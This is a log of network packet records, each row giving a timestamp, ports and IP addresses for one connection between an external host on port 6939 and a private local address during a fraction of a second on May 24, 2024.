May 24, 2024 05:09:50.050239086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.050250053 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.050293922 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.051217079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.051678896 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.051748991 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.057053089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.057264090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.057317972 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.057743073 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.058250904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.058260918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.058412075 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.059233904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.059355974 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.060317039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.060327053 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.060374022 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.060554981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.060565948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.060611010 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.061089993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.061100006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.061142921 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.062053919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.062062025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.062104940 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.062985897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.063950062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.063999891 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.064153910 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.064537048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.064547062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.064587116 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.064944029 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.064953089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.064990044 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.065716982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.065880060 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.067735910 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.091449976 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.091557026 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.091736078 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.092026949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.092086077 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.092525959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.092538118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.092585087 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.093492985 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.096313953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.096324921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.096380949 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.099448919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.099695921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.099874020 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.100033045 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.100044012 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.100210905 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.100450039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.100461006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.100498915 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.101234913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.101289988 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.101638079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.101648092 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.101655960 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.101702929 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.102416992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.102426052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.102469921 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.103183985 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.103193998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.103202105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.103236914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.103271008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.104012012 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.104022026 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.104064941 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.104764938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.104774952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.104784012 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.104824066 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.105556011 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.105565071 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.105608940 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.106323957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.106332064 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.106370926 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.107110023 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.107119083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.107161999 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.107919931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.107929945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.107938051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.107973099 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.108005047 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.108702898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.108712912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.108720064 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.108753920 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.109550953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.109561920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.109569073 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.109602928 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.109635115 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.110263109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.110272884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.110315084 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.111038923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.111047983 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.111054897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.111093998 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.111792088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.111803055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.111809969 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.111844063 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.111876011 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.112657070 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.112665892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.112708092 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.113415003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.113426924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.113435984 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.113529921 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.114031076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.114042997 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.114052057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.114089012 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.114119053 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.114881039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.114891052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.114939928 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.115560055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.115714073 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.115767002 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.115998983 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.116010904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.116054058 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.116348982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.116359949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.116369009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.116404057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.119616032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.119668007 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.120090961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.120251894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.120414972 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.120578051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.120874882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.120884895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.120924950 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.121438026 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.121449947 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.121493101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.124383926 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.124438047 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.124982119 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.125128031 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.125278950 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.125377893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.125390053 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.125439882 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.125669003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.125679970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.125690937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.125725985 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.129122972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.129174948 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.134234905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.134387016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.134465933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.134736061 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.135076046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.135085106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.135093927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.135102987 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.135232925 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.135234118 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.138011932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.138067961 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.138236046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.138246059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.138396025 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.138442039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.138783932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.138840914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.139118910 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.139130116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.139138937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.139173985 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.139730930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.139779091 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.146080017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.146279097 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.146333933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.146575928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.146584988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.146595001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.146733046 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.147192001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.147202015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.147247076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.149271965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.149323940 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.149466038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.149477959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.149524927 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.149812937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.150152922 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.150161982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.150171995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.150207043 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.150242090 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.151081085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.152936935 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.152987957 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.153079033 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.153373003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.153383970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.153392076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.153532982 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.153532982 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.155862093 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.155872107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.155917883 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.180541039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.180560112 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.180845976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.180866957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.181241035 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.181252003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.181261063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.181416035 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.181416035 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.185260057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.188587904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.188720942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.188797951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.189091921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.189100981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.189110041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.189243078 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.189244032 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.189784050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.189799070 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.189809084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.189856052 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.190557957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.190571070 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.190581083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.190589905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.190614939 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.191356897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.191368103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.191376925 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.191386938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.191406012 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.191427946 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.192146063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.192157030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.192164898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.192204952 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.192204952 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.192945957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.192956924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.192966938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.193021059 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.193689108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.193700075 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.193707943 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.193717957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.193742990 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.193775892 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.194556952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.194577932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.194590092 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.194601059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.194613934 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.194644928 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.195302010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.195314884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.195326090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.195338964 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.195358992 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.195388079 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.196041107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.196052074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.196090937 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.197571039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.197619915 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.197695017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.198009968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.198019981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.198030949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.198062897 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.198093891 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.199724913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.199738026 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.199779987 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.199937105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.200145960 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.200155973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.200166941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.200195074 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.200226068 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.200903893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.202383041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.202406883 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.202466011 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.204621077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.204691887 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.204713106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.204907894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.204919100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.204955101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.205308914 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.205355883 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.207130909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.207143068 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.207190990 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.209033012 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.209162951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.209209919 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.209384918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.209395885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.209436893 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.209763050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.211962938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.211976051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.212018013 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.213975906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.214092970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.214143038 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.214303970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.214353085 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.214505911 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.214670897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.214715958 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.216692924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.216702938 CEST	6939	49737	94.156.67.91	192.168.2.4
